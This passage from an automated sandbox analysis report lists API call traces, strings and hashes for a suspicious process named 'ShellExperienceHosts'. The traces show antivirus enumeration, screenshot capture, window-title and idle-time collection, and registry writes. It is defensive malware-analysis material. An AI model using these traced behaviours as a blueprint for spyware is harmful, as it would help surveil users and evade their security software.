                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                            • API String ID: 1671694837-1583895642
                                                                            • Opcode ID: 3608ce7c9022790785ab7a2da982ac3027d4348a1ecd55f7905c7a0ba447f548
                                                                            • Instruction ID: a01beef782996540b0f671ea241fafb237ad8a9ccb464522697bc3799b9d3c32
                                                                            • Opcode Fuzzy Hash: 3608ce7c9022790785ab7a2da982ac3027d4348a1ecd55f7905c7a0ba447f548
                                                                            • Instruction Fuzzy Hash: 1D4175F5A402686FDB24DB54CC91FAEB7B8AF48705F0441C9F749A7181DA74AA80CF64
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000002,?,18F775C8,?,00000000,?), ref: 0332C09E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0332C0AA
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0332C0BF
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0332C0D5
                                                                            • EnterCriticalSection.KERNEL32(0334FB64), ref: 0332C113
                                                                            • LeaveCriticalSection.KERNEL32(0334FB64), ref: 0332C124
                                                                              • Part of subcall function 03329DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03329E04
                                                                              • Part of subcall function 03329DE0: GdipDisposeImage.GDIPLUS(?), ref: 03329E18
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0332C14C
                                                                              • Part of subcall function 0332A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0332A48D
                                                                              • Part of subcall function 0332A460: _free.LIBCMT ref: 0332A503
                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 0332C16D
                                                                            • GlobalLock.KERNEL32(?), ref: 0332C177
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0332C18F
                                                                              • Part of subcall function 03329BA0: DeleteObject.GDI32(?), ref: 03329BD2
                                                                              • Part of subcall function 03329BA0: EnterCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329BE3
                                                                              • Part of subcall function 03329BA0: EnterCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329BF8
                                                                              • Part of subcall function 03329BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03329B7B), ref: 03329C04
                                                                              • Part of subcall function 03329BA0: LeaveCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329C15
                                                                              • Part of subcall function 03329BA0: LeaveCriticalSection.KERNEL32(0334FB64,?,?,?,03329B7B), ref: 03329C1C
                                                                            • GlobalSize.KERNEL32(00000000), ref: 0332C1A5
                                                                            • GlobalUnlock.KERNEL32(?), ref: 0332C221
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0332C249
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                            • String ID:
                                                                            • API String ID: 1483550337-0
                                                                            • Opcode ID: 93f47b30350d65c7b79fc8e86582af89344dd2db07b54a1d9f9785e3ba337bc9
                                                                            • Instruction ID: a8a5811ee8bf386b11f3095a19d56ddd0e0e76931b9bf358d4753faa19df73c3
                                                                            • Opcode Fuzzy Hash: 93f47b30350d65c7b79fc8e86582af89344dd2db07b54a1d9f9785e3ba337bc9
                                                                            • Instruction Fuzzy Hash: 126116B9D00218AFDB10EFA9D8C499EBBB8FF49710F14852AF515E7255DB34A901CB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 033264C2
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 033264E2
                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03326524
                                                                            • _memset.LIBCMT ref: 03326560
                                                                            • _memset.LIBCMT ref: 0332658E
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265BA
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265C3
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033265D5
                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03326625
                                                                            • lstrlenW.KERNEL32(?), ref: 03326635
                                                                            Strings
                                                                            • Software\Tencent\Plugin\VAS, xrefs: 033264D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                            • API String ID: 2921034913-3343197220
                                                                            • Opcode ID: 3baf5a270491dfa7735004f19f579e842ec109ff4cbdff38da2093ef25561a26
                                                                            • Instruction ID: 977ae693881d10113f55cd48a323ee1ed30c8003c5715a3ab70195a29298ce01
                                                                            • Opcode Fuzzy Hash: 3baf5a270491dfa7735004f19f579e842ec109ff4cbdff38da2093ef25561a26
                                                                            • Instruction Fuzzy Hash: 7D4175F5E40228ABD724DB54CDC5FEAB77DDF44700F004599F709B6041EA74AA858B64
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6C8F4114,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A139F
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A1411
                                                                            • GlobalHandle.KERNEL32(6C8F4108), ref: 6C7A141B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C7A142D
                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 6C7A1448
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C7A1453
                                                                            • LeaveCriticalSection.KERNEL32(6C8F4114), ref: 6C7A14A0
                                                                            • GlobalHandle.KERNEL32(6C8F4108), ref: 6C7A14B4
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C7A14BF
                                                                            • LeaveCriticalSection.KERNEL32(6C8F4114,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C7A14CE
                                                                            • EnterCriticalSection.KERNEL32(6C6B14F3,6C8F40F8,00000001,6C8F4108,?,?,?,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8), ref: 6C7A14EB
                                                                            • LeaveCriticalSection.KERNEL32(6C6B14F3,?,?,?,?,?,?,6C8F40F8,6C8F40F8,?,6C7A1752,00000004,6C75C8C8,6C73EE4E,6C75FACA), ref: 6C7A1548
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
                                                                            • String ID:
                                                                            • API String ID: 2233717024-0
                                                                            • Opcode ID: 9997bc117c90c0c938bc6f696ea6b0aee761afc9fed15f0d599e9d6097060291
                                                                            • Instruction ID: fc70e5a11373a00b4f435967152fc34da147fdc2f7132be80eeaace0d9f75a01
                                                                            • Opcode Fuzzy Hash: 9997bc117c90c0c938bc6f696ea6b0aee761afc9fed15f0d599e9d6097060291
                                                                            • Instruction Fuzzy Hash: 9451A07160061AEFEB14CFA8C988B59B7B9FF05315F104269E466D7A40DB70F952CB90
                                                                            APIs
                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0332A48D
                                                                            • _malloc.LIBCMT ref: 0332A4D1
                                                                            • _free.LIBCMT ref: 0332A503
                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0332A522
                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0332A594
                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0332A59F
                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0332A5C5
                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0332A5DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                            • String ID: &
                                                                            • API String ID: 2794124522-3042966939
                                                                            • Opcode ID: bdfc54c52fc7ae040221f49c1d7cdd29bda8b3d3dbd27116f61cf994def64bea
                                                                            • Instruction ID: 3ca1db08e0c0c669728898cbb4b57d30e69ba7f0a525920a0d41f632a9a8f576
                                                                            • Opcode Fuzzy Hash: bdfc54c52fc7ae040221f49c1d7cdd29bda8b3d3dbd27116f61cf994def64bea
                                                                            • Instruction Fuzzy Hash: 9C514575E002259FDB04DFA4D8C4AEFBBB8EF48710F148559E905AB250DB34E945CBE0
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                            • String ID: IpDates_info$SOFTWARE
                                                                            • API String ID: 864241144-2243437601
                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                            • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                            • String ID: IpDates_info$SOFTWARE
                                                                            • API String ID: 864241144-2243437601
                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,033412F8,18F775C8,00000001,00000000,00000000), ref: 0332CAB1
                                                                            • RegQueryInfoKeyW.ADVAPI32(033412F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0332CAE0
                                                                            • _memset.LIBCMT ref: 0332CB44
                                                                            • _memset.LIBCMT ref: 0332CB53
                                                                            • RegEnumValueW.KERNEL32(033412F8,?,00000000,?,00000000,?,00000000,?), ref: 0332CB72
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                              • Part of subcall function 0332F707: std::exception::exception.LIBCMT ref: 0332F756
                                                                              • Part of subcall function 0332F707: std::exception::exception.LIBCMT ref: 0332F770
                                                                              • Part of subcall function 0332F707: __CxxThrowException@8.LIBCMT ref: 0332F781
                                                                            • RegCloseKey.KERNEL32(033412F8,?,?,?,?,?,?,?,?,?,?,?,00000000,033412F8,000000FF), ref: 0332CC83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                            • String ID: Console\0
                                                                            • API String ID: 1348767993-1253790388
                                                                            • Opcode ID: 6a5f26959a0c77c0945fcf795851a3c3f15827b11bd952b9f2e6d0e2a2802ad0
                                                                            • Instruction ID: 57ea4c952ad659bfe2fa937437e41557d7e2c1635be5c0d61b810af000ea2b73
                                                                            • Opcode Fuzzy Hash: 6a5f26959a0c77c0945fcf795851a3c3f15827b11bd952b9f2e6d0e2a2802ad0
                                                                            • Instruction Fuzzy Hash: CF61FEB5D00219AFDB04DFA8D8C1EAEBBB9FB49310F144669F915E7245DB34A901CBA0
                                                                            APIs
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • _memset.LIBCMT ref: 0332BB21
                                                                            • GetLastInputInfo.USER32(?), ref: 0332BB37
                                                                            • GetTickCount.KERNEL32 ref: 0332BB3D
                                                                            • wsprintfW.USER32 ref: 0332BB66
                                                                            • GetForegroundWindow.USER32 ref: 0332BB6F
                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0332BB83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                            • String ID: %d min
                                                                            • API String ID: 3754759880-1947832151
                                                                            • Opcode ID: 58e571fe12410f8a76c8b66b2b621d444396eda66629f44f0a889519f07594e6
                                                                            • Instruction ID: c0d896c876b3aae6883771e1017343bee50f2cb3b5414376149af277025395b7
                                                                            • Opcode Fuzzy Hash: 58e571fe12410f8a76c8b66b2b621d444396eda66629f44f0a889519f07594e6
                                                                            • Instruction Fuzzy Hash: CE4171B5D00228AFCB10DFA4DCC5A9FBBB8AF44710F098555F909AB255DB74AA04CBA1
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(18F775C8,00000000,00000000,75BF73E0,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326938
                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326947
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 03326960
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,033410DB,000000FF,?,03326AB3,00000000), ref: 0332696B
                                                                            • SysStringLen.OLEAUT32(00000000), ref: 033269BE
                                                                            • SysStringLen.OLEAUT32(00000000), ref: 033269CC
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,033410DB,000000FF), ref: 03326A2E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,033410DB,000000FF), ref: 03326A34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                            • String ID:
                                                                            • API String ID: 429299433-0
                                                                            • Opcode ID: 5a5ea37fbe5f4cd646d7e7ab6318e392b50efb890375f2ba192a352a48cc5cc8
                                                                            • Instruction ID: 33b4e3b83c84e81ffab067fe7a05ac582690238a15310daa502c382dcedd87ce
                                                                            • Opcode Fuzzy Hash: 5a5ea37fbe5f4cd646d7e7ab6318e392b50efb890375f2ba192a352a48cc5cc8
                                                                            • Instruction Fuzzy Hash: A14195B6D406289BDB10DFA9CCC1AAEFBB8EF44710F144666E915F7241DB75A9008BA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: &$&
                                                                            • API String ID: 0-3764684571
                                                                            • Opcode ID: f6de54bdfee6ca7f30285d22065f4728ca915e1a5d7c530d05b9c0429fe1e718
                                                                            • Instruction ID: 31133ccc4dd62a009e67bc04e013b2b68a625b5216aa1338f2e33e8b3bc29594
                                                                            • Opcode Fuzzy Hash: f6de54bdfee6ca7f30285d22065f4728ca915e1a5d7c530d05b9c0429fe1e718
                                                                            • Instruction Fuzzy Hash: 77220C72E150A48BDF28CF64CC547EDBBB2AF8631CF164268D41AB7780DB319D848B95
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 03326DD9
                                                                            • RegOpenKeyExW.KERNEL32(80000001,03345164,00000000,00020019,75BF73E0), ref: 03326DFC
                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03326E4A
                                                                            • lstrcmpW.KERNEL32(?,03345148), ref: 03326E60
                                                                            • lstrcpyW.KERNEL32(033256EA,?), ref: 03326E72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                            • String ID: GROUP
                                                                            • API String ID: 2102619503-2593425013
                                                                            • Opcode ID: 1376c422c048385b61e908ac7839bd7f23ba989b30238f2489d63f26f8dccc93
                                                                            • Instruction ID: 3d52399bae6401eb00843c7633c9a591011bd7ba4febaffda3481a6d3daf787d
                                                                            • Opcode Fuzzy Hash: 1376c422c048385b61e908ac7839bd7f23ba989b30238f2489d63f26f8dccc93
                                                                            • Instruction Fuzzy Hash: 7C314775901329ABDB20DF90EDC9B9EB7B8FF08710F104699E515A7190DBB4AA44CF90
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 10007240
                                                                            • __calloc_crt.LIBCMT ref: 1000724C
                                                                            • __getptd.LIBCMT ref: 10007259
                                                                            • CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
                                                                            • _free.LIBCMT ref: 100072A3
                                                                            • __dosmaperr.LIBCMT ref: 100072AE
                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 155776804-0
                                                                            • Opcode ID: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                                                            • Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
                                                                            • Opcode Fuzzy Hash: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                                                            • Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0332FA4E
                                                                            • __calloc_crt.LIBCMT ref: 0332FA5A
                                                                            • __getptd.LIBCMT ref: 0332FA67
                                                                            • CreateThread.KERNEL32(00000000,00000000,0332F9C4,00000000,00000000,0332E003), ref: 0332FA9E
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,0332E003,00000000,00000000,03325F40,00000000,00000000,00000000), ref: 0332FAA8
                                                                            • _free.LIBCMT ref: 0332FAB1
                                                                            • __dosmaperr.LIBCMT ref: 0332FABC
                                                                              • Part of subcall function 0332F91B: __getptd_noexit.LIBCMT ref: 0332F91B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 155776804-0
                                                                            • Opcode ID: 5f979ed9adbf747f27abe598c30fd7caa1d622cc65e8ad470e5fc7864ff7b249
                                                                            • Instruction ID: 5da46513e30e3abed15a8a82cef7ed0f2483de71125f5b532a07519210339c89
                                                                            • Opcode Fuzzy Hash: 5f979ed9adbf747f27abe598c30fd7caa1d622cc65e8ad470e5fc7864ff7b249
                                                                            • Instruction Fuzzy Hash: F111A53A604726BFD711FFA9ECC099B7BA8DF06B70B158425F915DA150DB71D4018B60
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03327523), ref: 0332743D
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03327444
                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 03327452
                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 0332745A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 3433367815-192647395
                                                                            • Opcode ID: 2695536ff9b25a0f9fc0009b4d2545807ab405ab4c8e27f413d420dcc7cbb1d4
                                                                            • Instruction ID: 0cd89c7da36b80a47999a1cce96725b501aef489086d8102e075194c9ad58680
